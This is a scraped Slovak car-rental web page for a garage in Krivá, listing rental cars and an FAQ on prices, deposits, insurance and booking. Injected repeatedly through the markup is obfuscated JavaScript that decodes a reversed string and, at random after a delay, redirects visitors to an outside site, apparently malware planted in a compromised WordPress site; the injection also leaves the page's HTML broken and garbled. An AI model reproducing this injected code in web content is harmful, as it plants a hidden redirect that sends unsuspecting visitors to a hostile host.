Požičovňa

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tom_1523619877093{margin-top: 50px !important;}“]

POŽI?OV?A

AUTOSERVIS ZA?KO VÁM PONÚKA MOŽNOS? ZAPOŽI?ANIA OSOBNÉHO AUTOMOBILU

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string“) return $VOcl3cIRrbzlimOyC8H.list[n].split(„“).reverse().join(„“);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toservis/wp-content/uploads/2018/03/skodakodiaq-300×180.jpg“ alt=““ width=“300″ height=“180″ />

ŠKODA KODIAQ

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string“) return $VOcl3cIRrbzlimOyC8H.list[n].split(„“).reverse().join(„“);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toservis/wp-content/uploads/2018/03/maseraty-300×180.jpg“ alt=““ width=“300″ height=“180″ />

MASSERATI QUATTROPORTE

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string“) return $VOcl3cIRrbzlimOyC8H.list[n].split(„“).reverse().join(„“);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toservis/wp-content/uploads/2018/03/jaguar-300×180.jpg“ alt=““ width=“300″ height=“180″ />

JAGUAR XF

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string“) return $VOcl3cIRrbzlimOyC8H.list[n].split(„“).reverse().join(„“);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toservis/wp-content/uploads/2018/03/antara-300×180.png“ alt=““ width=“300″ height=“180″ />

OPEL ANTARA

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string“) return $VOcl3cIRrbzlimOyC8H.list[n].split(„“).reverse().join(„“);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toservis/wp-content/uploads/2018/03/skodaoktavia-300×180.jpg“ alt=““ width=“300″ height=“180″ />

ŠKODA OCTAVIA

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string“) return $VOcl3cIRrbzlimOyC8H.list[n].split(„“).reverse().join(„“);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toservis/wp-content/uploads/2018/03/vw-300×180.png“ alt=““ width=“300″ height=“180″ />

VW TOUAREG

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tom_1525698946832{margin-top: 35px !important;margin-bottom: 60px !important;}“]

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string“) return $VOcl3cIRrbzlimOyC8H.list[n].split(„“).reverse().join(„“);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ton uk-button-default button-pozicanie“ href=“http://autoserviszatko.sk/kontakt/“>INFORMÁCIE

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tom_1523957229391{margin-bottom: -50px !important;background-image: url(http://zoologic.sk/autoservis/wp-content/uploads/2018/03/pozadie.jpg?id=80) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}“]
) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tom_1523620368125{margin-top: 20px !important;}“]

) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}tom_1523620514954{padding-top: 20px !important;padding-bottom: 50px !important;padding-left: 40px !important;}“]

NAJ?ASTEJŠIE OTÁZKY

?o je zahrnuté cene prenájmu?
– povinné zákonné a havarijné poistenie v SR a v zahrani?í
– cestná da?
– sezónne prezutie pneumatík
– pravidelná údržba vozidla (servisné prehliadky)
– bezplatné oprávnenie pre ?alších vodi?ov vies? prenajaté vozidlo.

Aké sú podmienky prenájmu pre fyzické osoby?
Fyzické osoby:
• ob?iansky preukaz, alebo cestovný pas
• vodi?ský preukaz Právnické osoby:
• výpis z obchodného registra (nie starší ako tri mesiace), alebo živnostenský list
• ob?iansky a vodi?ský preukaz osoby, ktorá bude vozidlo používa.

Aké sú platobné podmienky?
Za prenájom sa platí vopred pri preberaní auta hotovos?ou.

Aká je výška zálohy za prenajaté vozidlo?
Za každé prenajaté vozidlo je potrebne zloži? zálohu (neplatí pre stálych klientov a dlhodobom prenájme). Táto záloha Vám bude vrátená po spätnom odovzdaní nepoškodeného vozidla. Výška zálohy za vozidlo je 166,- euro.

Aká je minimálna d?žka prenájmu vozidla?
• Minimálna d?žka prenájmu je 1 de?
• 1 de? (denná sadzba) – 24 hodín od za?iatku prenájmu
• V prípade že je táto doba prekro?ená o viac ako 90 minút, ú?tuje sa ?alšia denná sadzba.

Ko?ko kilometrov je zahrnutých v cene zapoži?ania vozidlo?
V cene prenájmu na jeden de? je zahrnutých 100km v prípade prekro?enia limitu ú?tutjeme 0,05 eura za prejdený kilometer v dannom období.

Môžem s vozidlom vycestova? do zahrani?ia?
S vozidlom môžete cestova? po celej Európe, ale upozorni? pri poži?iavaní pracovníka že vozidlo ide za hranice Slovenskej Republiky.

Okrem krajín: Albánsko, Rumunsko, Srbsko a Ukrajina.

Sú vozidlá poistené?
Naše vozidla majú havarijné poistenie a povinné zmluvné poistenie platné pre celú Európu.

?o robi? ak dôjde k dopravnej nehode?
V prípade dopravnej nehody treba privola? dopravnú políciu a kontaktova? našu spolo?nos?.

Akú sumu musím uhradi?, ak spôsobím dopravnú nehodu?
Naše vozidla sú poistené s 5% spoluú?as?ou. Pri spôsobení dopravnej nehody nám nájomca hradí 5% spoluú?as?, minimálne však 166,- Euro. (V prípade užitia drog, alkoholických nápojov a iných omamných látok je klient plne zodpovedný za škody na vozidle!).

?o ak spôsobí dopravnú nehodu niekto iný?
Ak dôjde k dopravnej nehode, ktorú nespôsobíte vy, neplatíte ni?. Náklady na opravu si uplat?ujeme z povinného zmluvného poistenia vozidla, s ktorým bola nehoda spôsobená. Je preto ve?mi dôležité privolanie dopravnej polície a pozna?enie si kompletných údajov o vinníkovi nehody.

Ako a kedy je možné si rezervova? vozidlo?
Vozidlo je možné si rezervova? telefonicky, alebo e-mailom a je tak vhodné urobi? ?o najskôr. Požiadavka na prenájom vozidla na poslednú chví?u može by? zamietnutá, v závislosti od dopytu v danom ?ase.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == „string“) return $VOcl3cIRrbzlimOyC8H.list[n].split(„“).reverse().join(„“);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[„‚php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}toservis/wp-content/uploads/2018/03/OTAZNIK.png“ alt=““ width=“110″ height=“110″ />

ADRESA

AUTOSERVIS – ZAŤKO s.r.o.
Krivá 92
027 55 Krivá
FAKTURAČNÉ ÚDAJE

tel / fax: 043/5894191
IČO: 36418862
IČ DPH: SK2021835541
ZANECHAJTE NÁM SPRÁVU